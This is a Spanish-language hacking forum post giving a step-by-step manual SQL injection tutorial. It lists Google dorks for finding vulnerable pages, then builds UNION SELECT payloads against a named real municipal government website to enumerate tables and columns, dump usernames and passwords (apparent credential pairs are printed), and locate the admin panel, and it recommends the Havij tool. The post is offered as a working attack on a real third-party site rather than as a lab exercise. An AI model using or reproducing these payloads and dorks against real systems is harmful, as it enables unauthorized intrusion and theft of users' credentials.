Team Hack►Mas que una Comunidad ☼☼►¢

Bienvenido a Team-Hack
Team Hack►Mas que una Comunidad ☼☼►¢

Team Hack►Mas que una Comunidad ☼☼►¢

Últimos temas

» Nuevo IXAT
Vie Jun 05, 2015 11:17 pm por Rexon150

» NUEVO IXAT
Sáb Oct 04, 2014 1:50 pm por DjPato

» Pack De Ddos
Mar Sep 09, 2014 1:36 pm por DjPato

» !REGRESAMOOOOS!!!
Lun Sep 08, 2014 8:40 pm por IDEMONS

» El Mejor Software Hack!
Lun Sep 08, 2014 8:13 pm por IDEMONS

» Encontrar Vulnerabilidades-(Backtrack)..etc
Lun Sep 08, 2014 8:02 pm por IDEMONS

» Eliminar Spywares, Adwares, Hijackers, Malware, Virus y Rootkits
Lun Sep 08, 2014 7:49 pm por IDEMONS

» Ataque Php
Lun Sep 08, 2014 3:51 pm por IDEMONS

» FACEBOOOOOOK
Sáb Jul 26, 2014 5:41 pm por nikoxD

Compañeros


Crear foro




    Injection SQL (Copia me canso mucho en escribir y me da peresa)

    Comparte
    avatar
    DjPato
    Admin
    Admin

    Mensajes : 56
    Fecha de inscripción : 18/12/2011

    Injection SQL (Copia me canso mucho en escribir y me da peresa)

    Mensaje  DjPato el Lun Jun 03, 2013 6:50 pm

    1. Como as visto en el video que para poder acceder a una web al panel de administrador logrando eso solo haciendo una ineyeccion y obvio que la web tiene que ser vulnerable web, ya que de esa vulnerabilidad se le puede aprovechar para poder hacer la inycción manualmente ok.



    2. como encontrar webs vulnerables: Muy simple nos vamos a google y ponemos una dorck : ¿Que es una dorck? = Es un codigo que explora a google y le ordena a los formularios de búsqueda de google diciendole: Quiero errores SQL jajaj haci bueno unas dorck se las dejo aki solo copiala y pegala en google y veras que saltaran unas webs vulberables en otros casos te arrojaran: index.php?id=15/noticias/etc... bueno lo que tienes que hacer es ir a la web y borrar: 15/noticias etcc lo que este pàra adelante y poner una coma para aver si arroja errores de SQL la web ok aki dejo las dorck:




    allinurl:*.php?txtCodiInfo=
    inurl:read.php?=
    inurl:"ViewerFrame?Mode="
    inurl:index.php?id=
    inurl:trainers.php?id=



    ok ahora ya que tenemos nuetra web vulnerable:


    http://www.muninuevochimbote.gob.pe/noticias_vermas.php?p=120

    ok para sacarle el error quitamos el 120 y ponemos la comilla haci:
    http://www.muninuevochimbote.gob.pe/noticias_vermas.php?p='
    y nos arroja:


    Warnig: MySQL_fre erro cheat on line (5) /home/public_html/php on line 35

    etc... BUENO SI NOS ARROJA ERROR 404 NO ES VULNERABLE: NO FOUND :

    OK AHORA BUENO COMO SAVEMOS QUE LA WEB ES VULNERABLE AHORA VAMOS A SACAR EL NUMERO DE TABLAS:

    LO QUE AREMOS ES SACAR UN NUMERO PARA DESPUÉS HACER OTRA INYECCIÓN OK LA HACEMOS INYECTANDO ESTO: -1+UNION+ALL+SELECT+0,1--

    OK COMO VEN ESO LA APLICAMOS HACI:
    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1--
    SI NOS ARROJO UN NUMERO ASTA ESE MOMENTO TENEMOS SUERTE PUES SI NO NO OK SEGUIMOS INYECTANDO:



    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,2,3,4--


    PUES AMI ME ARROJO ASTA EL "4" Y ME ARROJO UN NUMERO "2"
    PUES SI A TI NO TE SALE DALE ASTA EL 15 20 O 30 AVECES OK BUENO YA QUE TENEMOS ESE NUMERO "2" LO QUE AREMOS ES INYECTAR AL 2 DE NUESTRA PETICIÓN : 0,1,2,3,4-- PUES LO QUE HACEMOS ES REMPLAZAR EL 2 POR:
    TABLE_NAME


    YA QUE FUE ESE NUMERO EL QUE NOS ARROJO SI NOS ARROJO UN 4 Y UN 3 O 2 PUES PROBAMOS EN UN NUMERO EN ESTE CASO ME ARROJO UN SOLO NUMERO LLAMADO "2" OK LO QUE HACEMOS ES REMPLAZAR:


    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,TABLE_NAME,3,4-- YA PERO AUN FALTA INYECTAR MAS COMO EL +FROM+INFORMATION_SCHEMA.TABLES-- OK NOS QUEDARIA HACI:


    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,TABLE_NAME,3,4+FROM+INFORMATION_SCHEMA.TABLES--


    YA PUES AKI LA WEB NOS DEBE DE ARROJAR LAS COLUMNAS EN ESE CASO ME ARROJO:


    NOTICIAS
    VIDEO
    INTRANET
    COMENTARIOS
    BOLETIN
    DIRECCION
    MAPA
    USUARIOS
    SP
    SO


    OK HASTA AKI TODO EN ORDEN AHORA LO QUE AREMOS ES COJER UN "NOMBRE Y CONVERTIRLO A ASCII A EXZAGESIMALES OK PERO SUPONGAMOS QUE ATI TE SALIO :
    ADMIN
    USUARIOS
    NOTICIAS
    LO MAS PROBABLE ES QUE COJAS "ADMIN" YA QUE DENTRO DE EL ESTA EL USER Y EL PASS DEL PANEL DE LA WEB OK : OK LO CONVERTIMO LO QUE QUEREMOS SACAR: EN ESTE CASO : (USUARIOS)


    NOS VAMOS A: http://textop.us/Text-Convert/Ascii


    Y PEGAMOS USUARIOS Y LE DAMOS EN CONVERTIR A Ascii Numbers ok y no daria esto:


    usuarios= a : 117 115 117 097 114 105 111 115 y esto lo convertimos a comillas: haci:
    117,115,117,097,114,105,111,115 listo ya está ahora si a inyectar i arianos esto:


    ya lo que hacemos es borrar table_name y poner: group_concat(column_name) Y al ultimo borramos tables y ponemos esto:


    columns+where+table_name=char()-- BUENO Y DENTRO DE LOS PARENTESIS PONEMOS LOS NUMERO EN COMILLAS


    columns+where+table_name=char(117,115,117,097,114,105,111,115)-- Y NOS QUEDARIA HACI:


    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,GROUP_CONCAT(COLUMN_NAME),3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,115,117,097,114,105,111,115)--


    OK PUES HASTA AKI NOS DEBE DE ARROJAR:


    USUARIO,CONTRASENA,DIRECCIÓN,CIUDAD,NOMBRES :


    O TALVES NOS ARROJE SOLO USUARIO Y PASS PERO EN MI CASO ARROJO ES OK AHORA HACEMOS ESTO:
    VAMOS A BORRAR (COLUMN_NAME) Y REMPLAZAR POR LO QUE QUEREMOS SACAR: EN MI CASO USUARIO Y PASS HACI LO PONEMOS PERO CON UN CODIGO EN MEDIO DE AMBOS: 0X3A: OK QUEDARIA HACI: (Usuario,0x3a,Contrasena)


    ok y tambien borramos lo adelante: INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(117,115,117,097,114,105,111,115)--


    y NOS QUEDARIA HACI: www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,GROUP_CONCAT (Usuario,0x3a,Contrasena) ,3,4+FROM+ OK PERO AUN NO DEMOS ENTER POR QUE FALTA PONER LO QUE SACARIANOS COMO ESTA PRIMERO Usuario ponemos (usuario) haci:


    www.muninuevochimbote.gob.pe/noticias_vermas.php?p=-1+UNION+ALL+SELECT+0,1,GROUP_CONCAT (Usuario,0x3a,Contrasena) ,3,4+FROM+usuario-- como ven usuario tambien está al ultimo: ok y damos enter :


    y asta hay ya nos arrojaria todo lo que queremos


    el contenido de la pass y user: a mi me arrojo :


    juana: 1521454 sanches: 154sd4a6s: muel15987: 1152363
    user: manuel15987


    pass : 1152363


    bueno y hasta hay ya tenemos la pass y user ahora por lo final es buscar la dirección para ir al admin: lo pueden hacer manual o con programa mas rapido ok pero en mi caso salio en las misma web :


    ok pero supongamos que no está en la web lo que hacemos es:


    ejemplo que sea tu web está:
    www.mastercar.com ok le agregas admin al ultimo para aver si te manda a la dirección del panel haci:


    www.mastercar.com/admin das enter pues si no sale podria ser haci:


    www.mastercar.com/login.php
    www.mastercar.com/user.php
    www.mastercar.com/admin.user.php


    etc hay infinidades de poder allar pero hay un programa para sacar esto


    puedes usar havij ya que contiene una opción para sacar el ADMIN aki lo dejo para que lo descargues: ojo no lo uses mucho para hacer inyecciones ya que pierdes la avilidad por eso es mejor un poco manual ya si no found lo metes al programa que sea como havij backtrack SQL helper etc.
    Para descargalo ve AQUI y pon: havij.

    Espero que os halla gustado, me gusta, favoritos y hasta la proxima.

      Fecha y hora actual: Dom Nov 19, 2017 12:01 pm